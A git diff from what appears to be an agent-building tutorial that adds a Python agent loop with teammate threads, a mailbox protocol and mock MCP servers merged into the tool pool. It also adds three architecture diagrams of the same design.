Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "spawn_teammate, send_message, check_inbox, " + "request_shutdown, submit_plan, review_plan, " + "create_worktree, remove_worktree, keep_worktree, " + "connect_mcp. MCP tools are prefixed mcp__{server}__{tool}.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "team": "You can spawn autonomous teammates, create worktrees, " + "and connect MCP servers for external tools.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_team"): + sections.append(PROMPT_SECTIONS["team"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + mcp_names = list(mcp_clients.keys()) + if mcp_names: + sections.append(f"Connected MCP servers: {', '.join(mcp_names)}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s15) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + 
capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# ── MessageBus (from s15) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message", metadata: dict = None): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time(), "metadata": metadata or {}} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"({msg_type}) {content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() +active_teammates: dict[str, bool] = {} + + +# ── Protocol State (from s16) ── + +@dataclass +class ProtocolState: + request_id: str + type: str + sender: str + target: str + status: str + payload: str + created_at: float = field(default_factory=time.time) + + +pending_requests: dict[str, ProtocolState] = {} + + +def new_request_id() -> str: + return f"req_{random.randint(0, 999999):06d}" 
+ + +def match_response(response_type: str, request_id: str, approve: bool): + state = pending_requests.get(request_id) + if not state: + print(f" \033[31m[protocol] unknown request_id: {request_id}\033[0m") + return + state.status = "approved" if approve else "rejected" + icon = "✓" if approve else "✗" + color = "32" if approve else "31" + print(f" \033[{color}m[protocol] {state.type} {icon} " + f"({request_id}: {state.status})\033[0m") + + +# ── Autonomous Agent (from s17) ── + +IDLE_POLL_INTERVAL = 5 +IDLE_TIMEOUT = 60 + + +def scan_unclaimed_tasks() -> list[dict]: + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed + + +def idle_poll(agent_name: str, messages: list, + name: str, role: str) -> bool: + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): + time.sleep(IDLE_POLL_INTERVAL) + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + return True + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task_data = unclaimed[0] + claim_task(task_data["id"], agent_name) + wt_info = "" + if task_data.get("worktree"): + wt_info = f"\nWork directory: {WORKTREES_DIR / task_data['worktree']}" + messages.append({"role": "user", + "content": f"Task {task_data['id']}: " + f"{task_data['subject']}{wt_info}"}) + return True + return False + + +# ── Teammate Thread (from s15 + s16 + s17) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. 
" + f"Use tools to complete tasks.") + + def handle_inbox_message(name: str, msg: dict, messages: list): + msg_type = msg.get("type", "message") + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down.", + "shutdown_response", + {"request_id": req_id, "approve": True}) + return True + if msg_type == "plan_approval_response": + approve = meta.get("approve", False) + messages.append({"role": "user", + "content": "[Plan approved]" if approve + else f"[Plan rejected] {msg['content']}"}) + return False + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + ] + + def _run_list_tasks(): + tasks = list_tasks() + if not tasks: + return "No tasks." 
+ return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + + (f" (wt:{t.worktree})" if t.worktree else "") + for t in tasks) + + def _run_claim_task(task_id: str): + return claim_task(task_id, owner=name) + + sub_handlers = { + "bash": run_bash, "read_file": run_read, + "write_file": run_write, + "send_message": lambda to, content: (BUS.send(name, to, content), + "Sent")[1], + "list_tasks": _run_list_tasks, + "claim_task": _run_claim_task, + } + + while True: + if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) + should_shutdown = False + for _ in range(10): + inbox = BUS.read_inbox(name) + for msg in inbox: + stopped = handle_inbox_message(name, msg, messages) + if stopped: + should_shutdown = True + break + if should_shutdown: + break + if inbox and not should_shutdown: + non_protocol = [m for m in inbox + if m.get("type") == "message"] + if non_protocol: + messages.append({"role": "user", + "content": f"{json.dumps(non_protocol)}"}) + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + if should_shutdown: + break + found_work = idle_poll(name, messages, name, role) + if not found_work: + break + + summary = "Done." 
+ for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + return f"Teammate '{name}' spawned as {role}" + + +def _teammate_submit_plan(from_name: str, plan: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="plan_approval", + sender=from_name, target="lead", + status="pending", payload=plan) + BUS.send(from_name, "lead", plan, + "plan_approval_request", + {"request_id": req_id}) + return f"Plan submitted ({req_id})" + + +# ── Lead Protocol Tools (from s16) ── + +def run_request_shutdown(teammate: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="shutdown", + sender="lead", target=teammate, + status="pending", payload="") + BUS.send("lead", teammate, "Shut down.", + "shutdown_request", + {"request_id": req_id}) + return f"Shutdown request sent to {teammate}" + + +def run_submit_plan(teammate: str, plan: str) -> str: + BUS.send("lead", teammate, f"Submit plan for: {plan}", "message") + return f"Asked {teammate} to submit a plan" + + +def run_review_plan(request_id: str, approve: bool, + feedback: str = "") -> str: + state = pending_requests.get(request_id) + if not state: + return f"Request {request_id} not found" + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, + feedback or ("Approved" if approve else "Rejected"), + "plan_approval_response", + {"request_id": request_id, "approve": approve}) + return f"Plan {'approved' if approve else 'rejected'}" + + +# ── MCP System (s19 new) ── + +class MCPClient: + """Discovers and calls tools on an MCP server (mock for teaching).""" + + def 
__init__(self, name: str): + self.name = name + self.tools: list[dict] = [] + self._handlers: dict[str, callable] = {} + + def register(self, tool_defs: list[dict], + handlers: dict[str, callable]): + """Register tools and handlers (simulates tools/list discovery).""" + self.tools = tool_defs + self._handlers = handlers + + def call_tool(self, tool_name: str, args: dict) -> str: + """Call a tool on this server (simulates tools/call).""" + handler = self._handlers.get(tool_name) + if not handler: + return f"MCP error: unknown tool '{tool_name}'" + try: + return handler(**args) + except Exception as e: + return f"MCP error: {e}" + + +mcp_clients: dict[str, MCPClient] = {} + + +def _mock_server_docs(): + """Predefined 'docs' MCP server for demonstration.""" + client = MCPClient("docs") + client.register( + tool_defs=[ + {"name": "search", "description": "Search documentation.", + "inputSchema": {"type": "object", + "properties": {"query": {"type": "string"}}, + "required": ["query"]}}, + {"name": "get_version", "description": "Get API version.", + "inputSchema": {"type": "object", "properties": {}, + "required": []}}, + ], + handlers={ + "search": lambda query: f"[docs] Found 3 results for '{query}'", + "get_version": lambda: "[docs] API v2.1.0", + }) + return client + + +def _mock_server_deploy(): + """Predefined 'deploy' MCP server for demonstration.""" + client = MCPClient("deploy") + client.register( + tool_defs=[ + {"name": "trigger", "description": "Trigger a deployment.", + "inputSchema": {"type": "object", + "properties": {"service": {"type": "string"}}, + "required": ["service"]}}, + {"name": "status", "description": "Check deployment status.", + "inputSchema": {"type": "object", + "properties": {"service": {"type": "string"}}, + "required": ["service"]}}, + ], + handlers={ + "trigger": lambda service: f"[deploy] Triggered: {service}", + "status": lambda service: f"[deploy] {service}: running (v1.4.2)", + }) + return client + + +MOCK_SERVERS = { + "docs": 
_mock_server_docs, + "deploy": _mock_server_deploy, +} + + +def connect_mcp(name: str) -> str: + """Connect to an MCP server and discover its tools.""" + if name in mcp_clients: + return f"MCP server '{name}' already connected" + factory = MOCK_SERVERS.get(name) + if not factory: + available = ", ".join(MOCK_SERVERS.keys()) + return f"Unknown server '{name}'. Available: {available}" + mcp_client = factory() + mcp_clients[name] = mcp_client + tool_names = [t["name"] for t in mcp_client.tools] + print(f" \033[31m[mcp] connected: {name} → {tool_names}\033[0m") + return (f"Connected to MCP server '{name}'. " + f"Discovered {len(mcp_client.tools)} tools: {', '.join(tool_names)}") + + +def _make_mcp_handler(mcp_client, tool_name): + """Create a handler that routes to the right MCP client/tool pair.""" + def handler(**kwargs): + return mcp_client.call_tool(tool_name, kwargs) + return handler + + +def assemble_tool_pool() -> tuple[list[dict], dict]: + """Merge builtin tools + all MCP tools into one pool.""" + tools = list(BUILTIN_TOOLS) + handlers = dict(BUILTIN_HANDLERS) + for server_name, mcp_client in mcp_clients.items(): + for tool_def in mcp_client.tools: + prefixed = f"mcp__{server_name}__{tool_def['name']}" + tools.append({ + "name": prefixed, + "description": tool_def.get("description", ""), + "input_schema": tool_def.get("inputSchema", {}), + }) + handlers[prefixed] = _make_mcp_handler(mcp_client, tool_def["name"]) + return tools, handlers + + +# ── Lead Worktree Tools (from s18) ── + +def run_create_worktree(name: str, task_id: str = "") -> str: + return create_worktree(name, task_id) + +def run_remove_worktree(name: str) -> str: + return remove_worktree(name) + +def run_keep_worktree(name: str) -> str: + return keep_worktree(name) + + +# ── Basic tool handlers ── + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', 
'.join(blockedBy)})" if blockedBy else ""
+    print(f" \033[34m[create] {task.subject}{deps}\033[0m")
+    return f"Created {task.id}: {task.subject}{deps}"
+
+
+def run_list_tasks() -> str:
+    tasks = list_tasks()
+    if not tasks:
+        return "No tasks."
+    return "\n".join(
+        f" {t.id}: {t.subject} [{t.status}]"
+        + (f" (wt:{t.worktree})" if t.worktree else "")
+        for t in tasks)
+
+
+def run_claim_task(task_id: str) -> str:
+    return claim_task(task_id, owner="agent")
+
+def run_complete_task(task_id: str) -> str:
+    return complete_task(task_id)
+
+def run_spawn_teammate(name: str, role: str, prompt: str) -> str:
+    return spawn_teammate_thread(name, role, prompt)
+
+def run_send_message(to: str, content: str) -> str:
+    BUS.send("lead", to, content)
+    return f"Sent to {to}"
+
+def run_check_inbox() -> str:
+    msgs = BUS.read_inbox("lead")
+    if not msgs:
+        return "(inbox empty)"
+    lines = []
+    for m in msgs:
+        meta = m.get("metadata", {})
+        req_id = meta.get("request_id", "")
+        tag = f" [{m['type']} req:{req_id}]" if req_id else f" [{m['type']}]"
+        lines.append(f" [{m['from']}]{tag} {m['content'][:200]}")
+    return "\n".join(lines)
+
+def run_connect_mcp(name: str) -> str:
+    return connect_mcp(name)
+
+
+# ── Tool Definitions ──
+
+BUILTIN_TOOLS = [
+    {"name": "bash", "description": "Run a shell command.",
+     "input_schema": {"type": "object",
+                      "properties": {"command": {"type": "string"}},
+                      "required": ["command"]}},
+    {"name": "read_file", "description": "Read file contents.",
+     "input_schema": {"type": "object",
+                      "properties": {"path": {"type": "string"},
+                                     "limit": {"type": "integer"}},
+                      "required": ["path"]}},
+    {"name": "write_file", "description": "Write content to a file.",
+     "input_schema": {"type": "object",
+                      "properties": {"path": {"type": "string"},
+                                     "content": {"type": "string"}},
+                      "required": ["path", "content"]}},
+    {"name": "create_task", "description": "Create a task.",
+     "input_schema": {"type": "object",
+                      "properties": {"subject": {"type": "string"},
+                                     "description": {"type": "string"},
+                                     "blockedBy": {"type": "array",
+                                                   "items": {"type": "string"}}},
+                      "required": ["subject"]}},
+    {"name": "list_tasks", "description": "List all tasks.",
+     "input_schema": {"type": "object", "properties": {}, "required": []}},
+    {"name": "claim_task", "description": "Claim a pending task.",
+     "input_schema": {"type": "object",
+                      "properties": {"task_id": {"type": "string"}},
+                      "required": ["task_id"]}},
+    {"name": "complete_task", "description": "Complete an in-progress task.",
+     "input_schema": {"type": "object",
+                      "properties": {"task_id": {"type": "string"}},
+                      "required": ["task_id"]}},
+    {"name": "spawn_teammate", "description": "Spawn an autonomous teammate.",
+     "input_schema": {"type": "object",
+                      "properties": {"name": {"type": "string"},
+                                     "role": {"type": "string"},
+                                     "prompt": {"type": "string"}},
+                      "required": ["name", "role", "prompt"]}},
+    {"name": "send_message", "description": "Send message to a teammate.",
+     "input_schema": {"type": "object",
+                      "properties": {"to": {"type": "string"},
+                                     "content": {"type": "string"}},
+                      "required": ["to", "content"]}},
+    {"name": "check_inbox",
+     "description": "Check inbox for messages and protocol responses.",
+     "input_schema": {"type": "object", "properties": {}, "required": []}},
+    {"name": "request_shutdown",
+     "description": "Request a teammate to shut down.",
+     "input_schema": {"type": "object",
+                      "properties": {"teammate": {"type": "string"}},
+                      "required": ["teammate"]}},
+    {"name": "submit_plan",
+     "description": "Ask a teammate to submit a plan.",
+     "input_schema": {"type": "object",
+                      "properties": {"teammate": {"type": "string"},
+                                     "plan": {"type": "string"}},
+                      "required": ["teammate", "plan"]}},
+    {"name": "review_plan",
+     "description": "Approve or reject a submitted plan.",
+     "input_schema": {"type": "object",
+                      "properties": {"request_id": {"type": "string"},
+                                     "approve": {"type": "boolean"},
+                                     "feedback": {"type": "string"}},
+                      "required": ["request_id", "approve"]}},
+    {"name": "create_worktree",
+     "description": "Create an isolated git worktree.",
+     "input_schema": {"type": "object",
+                      "properties": {"name": {"type": "string"},
+                                     "task_id": {"type": "string"}},
+                      "required": ["name"]}},
+    {"name": "remove_worktree",
+     "description": "Remove a worktree and auto-complete its task.",
+     "input_schema": {"type": "object",
+                      "properties": {"name": {"type": "string"}},
+                      "required": ["name"]}},
+    {"name": "keep_worktree",
+     "description": "Keep a worktree for manual review.",
+     "input_schema": {"type": "object",
+                      "properties": {"name": {"type": "string"}},
+                      "required": ["name"]}},
+    # s19 new: MCP
+    {"name": "connect_mcp",
+     "description": "Connect to an MCP server (docs, deploy) and discover tools.",
+     "input_schema": {"type": "object",
+                      "properties": {"name": {"type": "string"}},
+                      "required": ["name"]}},
+]
+
+BUILTIN_HANDLERS = {
+    "bash": run_bash, "read_file": run_read, "write_file": run_write,
+    "create_task": run_create_task, "list_tasks": run_list_tasks,
+    "claim_task": run_claim_task, "complete_task": run_complete_task,
+    "spawn_teammate": run_spawn_teammate,
+    "send_message": run_send_message, "check_inbox": run_check_inbox,
+    "request_shutdown": run_request_shutdown,
+    "submit_plan": run_submit_plan, "review_plan": run_review_plan,
+    "create_worktree": run_create_worktree,
+    "remove_worktree": run_remove_worktree,
+    "keep_worktree": run_keep_worktree,
+    "connect_mcp": run_connect_mcp,
+}
+
+
+# ── Context ──
+
+def update_context(context: dict, messages: list) -> dict:
+    text = " ".join(str(m.get("content", ""))[:200]
+                    for m in messages[-6:]).lower()
+    return {"has_todos": "task" in text or "todo" in text,
+            "has_skills": "skill" in text,
+            "has_team": ("teammate" in text or "spawn" in text or
+                         "inbox" in text or "worktree" in text or "mcp" in text),
+            "memories": context.get("memories", "")}
+
+
+# ── Agent Loop (s19: dynamic tool pool) ──
+
+def agent_loop(messages: list, context: dict):
+    tools,
handlers = assemble_tool_pool()
+    system = get_system_prompt(context)
+    while True:
+        try:
+            response = client.messages.create(
+                model=MODEL, system=system, messages=messages,
+                tools=tools, max_tokens=8000)
+        except Exception as e:
+            messages.append({"role": "assistant", "content": [
+                {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]})
+            return
+
+        messages.append({"role": "assistant", "content": response.content})
+        if response.stop_reason != "tool_use":
+            return
+
+        results = []
+        for block in response.content:
+            if block.type != "tool_use":
+                continue
+            print(f"\033[36m> {block.name}\033[0m")
+            handler = handlers.get(block.name)
+            try:
+                output = (handler(**block.input) if handler
+                          else f"Unknown tool: {block.name}")
+            except Exception as e:
+                # Feed handler failures back to the model instead of
+                # crashing the whole loop on one bad tool input
+                output = f"[Tool error] {type(e).__name__}: {e}"
+            print(str(output)[:300])
+            results.append({"type": "tool_result",
+                            "tool_use_id": block.id, "content": output})
+        messages.append({"role": "user", "content": results})
+
+        # Re-assemble pool if connect_mcp was called
+        if any(b.name == "connect_mcp" for b in response.content
+               if b.type == "tool_use"):
+            tools, handlers = assemble_tool_pool()
+            context = update_context(context, messages)
+            system = get_system_prompt(context)
+
+
+if __name__ == "__main__":
+    print("s19: mcp plugin")
+    print("Enter a question, press Enter to send. 
Type q to quit.\n")
+    history = []
+    context = {"has_todos": False, "has_skills": False,
+               "has_team": False, "memories": ""}
+    while True:
+        try:
+            query = input("\033[36ms19 >> \033[0m")
+        except (EOFError, KeyboardInterrupt):
+            break
+        if query.strip().lower() in ("q", "exit", ""):
+            break
+        history.append({"role": "user", "content": query})
+        agent_loop(history, context)
+        context = update_context(context, history)
+        for block in history[-1]["content"]:
+            # Handle both SDK content blocks and the plain-dict error
+            # blocks agent_loop appends on API failure
+            if isinstance(block, dict):
+                if block.get("type") == "text":
+                    print(block["text"])
+            elif getattr(block, "type", None) == "text":
+                print(block.text)
+
+        inbox = BUS.read_inbox("lead")
+        if inbox:
+            print(f"\n\033[33m[Inbox: {len(inbox)}]\033[0m")
+            for msg in inbox:
+                meta = msg.get("metadata", {})
+                req_id = meta.get("request_id", "")
+                msg_type = msg.get("type", "")
+                if req_id and msg_type.endswith("_response"):
+                    approve = meta.get("approve", False)
+                    match_response(msg_type, req_id, approve)
+                else:
+                    print(f" [{msg['from']}] {msg['content'][:200]}")
+        print()
diff --git a/s19_mcp_plugin/images/mcp-architecture.en.svg b/s19_mcp_plugin/images/mcp-architecture.en.svg
new file mode 100644
index 000000000..478be8f79
--- /dev/null
+++ b/s19_mcp_plugin/images/mcp-architecture.en.svg
@@ -0,0 +1,110 @@
+[SVG markup lost in extraction (110 added lines); recoverable labels follow.]
+[Title: MCP Plugin — Standard Protocol + External Tool Integration + Tool Pool Merge. Legend: s18 preserved / s19 new. Loop nodes: cron → messages → prompt → LLM → TOOL DISPATCH (s18 + s19): bash · read · write · task(4) · send · inbox, plus ★ connect_mcp and dynamic mcp__server__tool tools.]
+[Agent side (MCPClient): connect_mcp → discover → register tools; assemble_tool_pool merges builtin + mcp; call_tool("mcp__docs__search", ...). Wire protocol: tools/list, tools/call → response. MCP servers (external services): docs server (search · get_version), deploy server (trigger · status); any language, just needs stdio JSON-RPC.]
+[Tool naming: mcp__{server}__{tool}, e.g. mcp__docs__search · mcp__deploy__trigger; prevents name collisions across servers.]
+[Footer: s18 = worktree + events.jsonl + protocols + auto_claim (Lead 16); s19 = MCPClient + assemble_tool_pool + connect_mcp (Lead 16 + dynamic MCP). "s19 is the final chapter. 19 mechanisms all hook onto the same while True loop — the loop itself, unchanged."]
diff --git a/s19_mcp_plugin/images/mcp-architecture.ja.svg b/s19_mcp_plugin/images/mcp-architecture.ja.svg
new file mode 100644
index 000000000..6c1c3ec49
--- /dev/null
+++ b/s19_mcp_plugin/images/mcp-architecture.ja.svg
@@ -0,0 +1,110 @@
+[SVG markup lost in extraction (110 added lines); Japanese translation of the mcp-architecture.en.svg diagram, same layout and labels.]
diff --git a/s19_mcp_plugin/images/mcp-architecture.svg b/s19_mcp_plugin/images/mcp-architecture.svg
new file mode 100644
index 000000000..843bc05a6
--- /dev/null
+++ b/s19_mcp_plugin/images/mcp-architecture.svg
@@ -0,0 +1,110 @@
+[SVG markup lost in extraction (110 added lines); Chinese original of the mcp-architecture diagram, same layout and labels as the en version.]
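
All three diagrams describe the same four-step flow: discover a server's tools over stdio JSON-RPC (`tools/list`), rename each one to `mcp__{server}__{tool}`, merge the result into the builtin pool, and route `tools/call` back to the owning server. The sketch below illustrates that flow in a self-contained form; `fake_docs_server`, `discover`, and `call_tool` are hypothetical stand-ins for this chapter's real `MCPClient` and `assemble_tool_pool`, and an in-process function replaces the real stdio transport so the exchange can run without an external server.

```python
import json

# Hypothetical in-process stand-in for an MCP server's stdio endpoint:
# takes one JSON-RPC 2.0 request line, returns one response line.
def fake_docs_server(request_line: str) -> str:
    req = json.loads(request_line)
    if req["method"] == "tools/list":
        result = {"tools": [
            {"name": "search", "description": "Search the docs.",
             "inputSchema": {"type": "object",
                             "properties": {"query": {"type": "string"}},
                             "required": ["query"]}}]}
    elif req["method"] == "tools/call":
        args = req["params"]["arguments"]
        result = {"content": [{"type": "text",
                               "text": f"results for {args['query']!r}"}]}
    else:
        result = {}
    return json.dumps({"jsonrpc": "2.0", "id": req["id"], "result": result})

def discover(server_name: str, transport) -> list[dict]:
    """tools/list, then namespace each tool as mcp__{server}__{tool}."""
    req = json.dumps({"jsonrpc": "2.0", "id": 1,
                      "method": "tools/list", "params": {}})
    resp = json.loads(transport(req))
    return [{"name": f"mcp__{server_name}__{t['name']}",
             "description": t["description"],
             "input_schema": t["inputSchema"]}
            for t in resp["result"]["tools"]]

def merge_tool_pool(builtin: list[dict], mcp_tools: list[dict]) -> list[dict]:
    # Builtin tools win on name collision; the mcp__ prefix makes
    # collisions between servers (and with builtins) unlikely.
    seen = {t["name"] for t in builtin}
    return builtin + [t for t in mcp_tools if t["name"] not in seen]

def call_tool(name: str, args: dict, transports: dict) -> str:
    # mcp__docs__search -> server "docs", remote tool "search"
    _, server, tool = name.split("__", 2)
    req = json.dumps({"jsonrpc": "2.0", "id": 2, "method": "tools/call",
                      "params": {"name": tool, "arguments": args}})
    resp = json.loads(transports[server](req))
    return resp["result"]["content"][0]["text"]

tools = merge_tool_pool(
    [{"name": "bash", "description": "Run a shell command.",
      "input_schema": {"type": "object"}}],
    discover("docs", fake_docs_server))
print([t["name"] for t in tools])   # -> ['bash', 'mcp__docs__search']
print(call_tool("mcp__docs__search", {"query": "hooks"},
                {"docs": fake_docs_server}))
```

The dispatch side never needs to know which tools are remote: the `mcp__` prefix both prevents collisions and encodes the routing information that `call_tool` later splits back out.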